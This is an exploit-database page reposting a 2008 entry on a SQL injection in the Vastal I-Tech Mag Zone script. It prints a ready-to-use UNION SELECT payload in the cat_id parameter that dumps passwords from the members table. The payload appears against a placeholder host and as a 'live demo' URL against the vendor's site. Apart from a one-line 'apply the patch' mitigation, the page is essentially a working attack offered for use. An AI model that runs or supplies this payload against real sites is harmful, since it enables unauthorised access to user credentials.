header-logo
Suggest Exploit
vendor:
Mag Zone
by:
Stack
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mag Zone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vastal I-Tech Mag Zone SQL Injection Vulnerability

The exploit takes advantage of a vulnerability in the Vastal I-Tech Mag Zone script, which allows an attacker to gain access to the password of a user by using a specially crafted SQL query. The attacker can use the URL http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/* to exploit the vulnerability. A live demo of the exploit can be found at http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*.

Mitigation:

The vendor has released a patch to address the vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

#######################################################
#  Vastal I-Tech Mag Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
#
# Demo      : http://www.vastal.com/mag/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
Live Demo
http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*

# milw0rm.com [2008-09-05]

Navigation

Suggest Exploit

Services By CQR